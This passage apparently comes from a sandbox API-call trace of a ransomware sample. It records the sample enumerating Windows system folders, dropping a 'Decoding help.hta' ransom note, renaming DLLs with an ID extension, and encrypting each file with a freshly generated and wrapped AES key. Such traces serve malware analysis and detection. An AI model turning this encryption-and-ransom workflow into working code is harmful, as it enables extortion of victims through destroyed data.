Shared\\VBA\\*.*" [0044.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*") returned 58 [0044.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\", lpString2="VBA7" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7" [0044.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" [0044.685] GlobalMemoryStatus (in: lpBuffer=0x1961fd10 | out: lpBuffer=0x1961fd10) [0044.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4148250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b0 [0044.755] CloseHandle (hObject=0x3b0) returned 1 [0044.755] FindNextFileW (in: hFindFile=0x5da8b8, lpFindFileData=0x1961fd30 | out: lpFindFileData=0x1961fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA7", cAlternateFileName="")) returned 0 [0044.755] FindClose (in: hFindFile=0x5da8b8 | out: hFindFile=0x5da8b8) returned 1 Thread: id = 397 os_tid = 0xae4 [0043.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*", lpFindFileData=0x1975fd30 | out: lpFindFileData=0x1975fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da878 [0044.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.554] FindNextFileW (in: hFindFile=0x5da878, lpFindFileData=0x1975fd30 | out: lpFindFileData=0x1975fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.554] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.554] FindNextFileW (in: hFindFile=0x5da878, lpFindFileData=0x1975fd30 | out: lpFindFileData=0x1975fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0044.554] lstrcmpW (lpString1=".", lpString2="14") returned -1 [0044.554] lstrcmpW (lpString1="..", lpString2="14") returned -1 [0044.554] lstrcmpiW (lpString1="windows", lpString2="14") returned 1 [0044.554] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*" [0044.554] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*") returned 82 [0044.554] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\", lpString2="14" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" [0044.554] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*" [0044.554] GlobalMemoryStatus (in: lpBuffer=0x1975fd10 | out: lpBuffer=0x1975fd10) [0044.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93e83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0044.686] CloseHandle (hObject=0x260) returned 1 [0044.686] FindNextFileW (in: hFindFile=0x5da878, lpFindFileData=0x1975fd30 | out: lpFindFileData=0x1975fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 0 [0044.686] FindClose (in: hFindFile=0x5da878 | out: hFindFile=0x5da878) returned 1 Thread: id = 398 os_tid = 0xb04 [0043.877] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*", lpFindFileData=0x1989fd30 | out: lpFindFileData=0x1989fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da938 [0044.752] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.752] FindNextFileW (in: hFindFile=0x5da938, lpFindFileData=0x1989fd30 | out: lpFindFileData=0x1989fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.752] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.752] FindNextFileW (in: hFindFile=0x5da938, lpFindFileData=0x1989fd30 | out: lpFindFileData=0x1989fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ef3e00, ftCreationTime.dwHighDateTime=0x1cbd033, ftLastAccessTime.dwLowDateTime=0xd2618ca0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc9ef3e00, ftLastWriteTime.dwHighDateTime=0x1cbd033, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0044.752] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" [0044.752] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned 57 [0044.752] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta" [0044.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\decoding help.hta")) returned 0xffffffff [0044.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0044.753] WriteFile (in: hFile=0x3d8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1989fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1989fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.753] CloseHandle (hObject=0x3d8) returned 1 [0044.754] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.754] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdia100.dll") returned -1 [0044.754] lstrlenW (lpString="msdia100.dll") returned 12 [0044.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" [0044.754] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned 57 [0044.754] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\", lpString2="msdia100.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" [0044.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" [0044.754] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0044.800] CreateFileMappingA (hFile=0x3a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x774 [0044.800] CryptAcquireContextA (in: phProv=0x1989fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1989fcec*=0x3448c70) returned 1 [0044.801] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1989fce8 | out: phKey=0x1989fce8*=0x5da978) returned 1 [0044.801] CryptExportKey (in: hKey=0x5da978, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1989fbe4, pdwDataLen=0x1989fce4 | out: pbData=0x1989fbe4*, pdwDataLen=0x1989fce4*=0x2c) returned 1 [0044.801] MapViewOfFile (hFileMappingObject=0x774, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf1b40) returned 0xf750000 [0044.843] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1989fbe4*, pdwDataLen=0x1989fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1989fbe4*, pdwDataLen=0x1989fcf8*=0x100) returned 1 [0044.843] CryptEncrypt (in: hKey=0x5da978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xf750000, pdwDataLen=0x1989fce4*=0xf1b40, dwBufLen=0xf1b40 | out: pbData=0xf750000*, pdwDataLen=0x1989fce4*=0xf1b40) returned 1 [0045.252] UnmapViewOfFile (lpBaseAddress=0xf750000) returned 1 [0045.611] CloseHandle (hObject=0x774) returned 1 [0045.611] CryptDestroyKey (hKey=0x5da978) returned 1 [0045.611] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0045.611] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.611] WriteFile (in: hFile=0x3a0, lpBuffer=0x1989fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1989fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1989fbe4*, lpNumberOfBytesWritten=0x1989fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.612] WriteFile (in: hFile=0x3a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1989fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1989fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.612] CloseHandle (hObject=0x3a0) returned 1 [0045.623] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.623] FindNextFileW (in: hFindFile=0x5da938, lpFindFileData=0x1989fd30 | out: lpFindFileData=0x1989fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia90.dll", cAlternateFileName="")) returned 1 [0048.833] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" [0048.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned 57 [0048.833] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta" [0048.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\decoding help.hta")) returned 0x1 [0048.834] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdia90.dll") returned -1 [0048.834] lstrlenW (lpString="msdia90.dll") returned 11 [0048.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" [0048.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned 57 [0048.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\", lpString2="msdia90.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" [0048.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" [0048.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e8 [0051.174] CreateFileMappingA (hFile=0x6e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6dc [0051.174] CryptAcquireContextA (in: phProv=0x1989fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1989fcec*=0x3449468) returned 1 [0054.742] CryptGenKey (in: hProv=0x3449468, Algid=0x6610, dwFlags=0x1, phKey=0x1989fce8 | out: phKey=0x1989fce8*=0x5a5e70) returned 1 [0054.742] CryptExportKey (in: hKey=0x5a5e70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1989fbe4, pdwDataLen=0x1989fce4 | out: pbData=0x1989fbe4*, pdwDataLen=0x1989fce4*=0x2c) returned 1 [0054.742] MapViewOfFile (hFileMappingObject=0x6dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd0d40) returned 0x7010000 [0054.751] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1989fbe4*, pdwDataLen=0x1989fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1989fbe4*, pdwDataLen=0x1989fcf8*=0x100) returned 1 [0054.752] CryptEncrypt (in: hKey=0x5a5e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7010000, pdwDataLen=0x1989fce4*=0xd0d40, dwBufLen=0xd0d40 | out: pbData=0x7010000*, pdwDataLen=0x1989fce4*=0xd0d40) returned 1 [0054.856] UnmapViewOfFile (lpBaseAddress=0x7010000) returned 1 [0054.867] CloseHandle (hObject=0x6dc) returned 1 [0054.867] CryptDestroyKey (hKey=0x5a5e70) returned 1 [0054.867] CryptReleaseContext (hProv=0x3449468, dwFlags=0x0) returned 1 [0054.868] SetFilePointerEx (in: hFile=0x6e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.868] WriteFile (in: hFile=0x6e8, lpBuffer=0x1989fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1989fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1989fbe4*, lpNumberOfBytesWritten=0x1989fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.948] WriteFile (in: hFile=0x6e8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1989fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1989fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.948] CloseHandle (hObject=0x6e8) returned 1 [0056.948] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.492] FindNextFileW (in: hFindFile=0x5da938, lpFindFileData=0x1989fd30 | out: lpFindFileData=0x1989fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia90.dll", cAlternateFileName="")) returned 0 [0058.492] FindClose (in: hFindFile=0x5da938 | out: hFindFile=0x5da938) returned 1 Thread: id = 399 os_tid = 0xafc [0043.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*", lpFindFileData=0x199dfd30 | out: lpFindFileData=0x199dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8f8 [0044.680] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.680] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x199dfd30 | out: lpFindFileData=0x199dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.680] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.680] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.681] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x199dfd30 | out: lpFindFileData=0x199dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0044.681] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*" [0044.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*") returned 58 [0044.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\Decoding help.hta" [0044.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\decoding help.hta")) returned 0xffffffff [0044.681] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0044.682] WriteFile (in: hFile=0x6a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x199dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x199dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.683] CloseHandle (hObject=0x6a0) returned 1 [0044.683] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.683] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VGX.dll") returned -1 [0044.683] lstrlenW (lpString="VGX.dll") returned 7 [0044.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*" [0044.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*") returned 58 [0044.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\", lpString2="VGX.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" [0044.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" | out: 